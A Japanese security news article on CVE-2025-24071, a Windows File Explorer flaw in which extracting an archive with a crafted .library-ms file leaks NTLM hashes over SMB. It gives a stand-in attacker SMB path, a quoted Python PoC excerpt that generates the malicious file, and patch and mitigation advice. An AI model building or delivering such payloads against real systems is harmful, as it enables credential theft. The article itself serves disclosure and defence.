Windows 11 File Explorer の脆弱性 CVE-2025-24071:NTLM Hash 窃取での悪用と PoC のリリース

Windows 11 File Explorer Vulnerability Enables NTLM Hash Theft

2025/05/29 gbhackers — Windows File Explorer に発見された脆弱性 CVE-2025-24071 が、”.library-ms” ファイルと SMB プロトコルをサポートする、Windows 11 (23H2) 以下のバージョンに強く影響を及ぼすものだ。この脆弱性を悪用する攻撃者は、ユーザーを騙して悪意の ZIP アーカイブを解凍させるだけで、NTLM (New Technology LAN Manager) 認証ハッシュを取得できる。それ以上の操作は、まったく不要である。

この脆弱性は、Windows File Explorer の自動ファイル処理に存在する。

細工された “.library-ms” ファイルを取り込んだ、ZIP/RAR アーカイブが解凍されると、Windows Explorer と SearchProtocolHost.exe サービスは、対象となるファイルを自動的に解析してメタデータを収集する。

したがって、攻撃者が制御するリモート SMB (Server Message Block) パス (例: \attacker_ip\shared) を、”.library-ms” ファイルが参照している場合には、そのサーバへ向けた SMB 認証ハンドシェイクが、Windows により開始される。

このハンドシェイクは、被害者の NTLMv2 ハッシュを送信するため、それを傍受する攻撃者は、オフラインで解読する可能性を手にする。

技術用語と構成要素
  • NTLM ハッシュ:Windows ユーザのパスワードを暗号化したものであり、チャレンジ・レスポンス認証で使用される。
  • “.library-ms”ファイル:Windows が仮想ライブラリまたは、フォルダのコレクションを定義するために使用する、XML ベースのファイル形式。
  • SMBプロトコル:Windows が、ネットワーク経由でファイル/プリンタにアクセスするために使用する、ネットワーク・ファイル共有プロトコル。
  • 情報漏洩:機密認証データが漏洩する脆弱性を指す。
PoC エクスプロイトと攻撃コード

セキュリティ研究者である Mohammed Idrees Banyamer が、この攻撃を実証するための PoC エクスプロイトを公開した。

この Python スクリプトは、攻撃者が制御する SMB サーバへ向けた参照を埋め込んだ、悪意の “.library-ms” ファイルの作成を自動化するものだ。このスクリプトにより、対象となるファイルが ZIPアーカイブにパッケージ化される。

そのアーカイブを被害者が解凍すると、システムは自動的に攻撃者の SMB サーバへの認証を試み、NTLM ハッシュが漏洩する。

キーコードの抜粋
pythondef create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:
    payload = f'''<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\{ip}\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>'''
    output_file = output_dir / f"{filename}.library-ms"
    output_file.write_text(payload, encoding="utf-8")
    return output_file

このスクリプトを用いる攻撃者は、フィッシング・メールや悪意のあるダウンロードを配布する、ZIP ファイルの生成が可能になる。また、被害者がアーカイブを解凍した後に、NTLM ハッシュを監視/取得するために、Responder などのツールを使用できる。

実世界への影響と、悪用の可能性と、緩和策

すでに、この脆弱性は積極的に悪用されており、政府機関や民間組織を標的とするキャンペーンを引き起こしている。

攻撃者は、フィッシング・メール/Dropbox リンク/アンダーグラウンド・フォーラムを介して、悪意の ZIP アーカイブを配布している。この脆弱性を悪用する、マルウェアの開発と販売には、Krypt0n という脅威アクターが関与していることも判明している。

想定されるリスクは、以下のとおりである:

  • Pass-the-Hash 攻撃による認証情報の窃取
  • ネットワーク内でのラテラル・ムーブメントの可能性
  • NTLM ハッシュのオフライン・クラッキング

すでに Microsoft は、2025年3月の Patch Tuesday で、この脆弱性に対処している。したがって、すべてのユーザーに強く推奨されるのは、最新のセキュリティ・パッチを速やかに適用することである。

さらに、ユーザー組織に推奨されるのは、可能な限りNTLM 認証を制限あるいは無効化し、SMB 署名を有効化し、不審な SMB トラフィックを監視することである。

概要表:
AspectDetails
CVECVE-2025-24071
Affected SystemsWindows 10/11 (all supporting .library-ms and SMB)
Attack VectorZIP/RAR archive with malicious .library-ms file
ImpactNTLM hash disclosure (information disclosure)
Patch AvailableYes (March 2025 Patch Tuesday)
Recommended ActionsApply patches, restrict NTLM, enable SMB signing, monitor SMB traffic

このインシデントが浮き彫りにするのは、レガシー認証プロトコルがもたらす継続的なリスクの存在である。ユーザー企業の環境における、迅速なパッチ適用と多層的なセキュリティ管理が必要である。

Windows Explorer に見つかった脆弱性ですが、思ったよりも簡単に悪用できてしまうのが怖いですね。特に ZIP を開くだけで、認証情報が漏れるとのことです。すでに悪用も始まっているようなので、パッチの適用はもちろん、NTLM の使用を見直すなどの対策が大事なのでしょう。よろしければ、Windows Explorer で検索も、ご参照ください。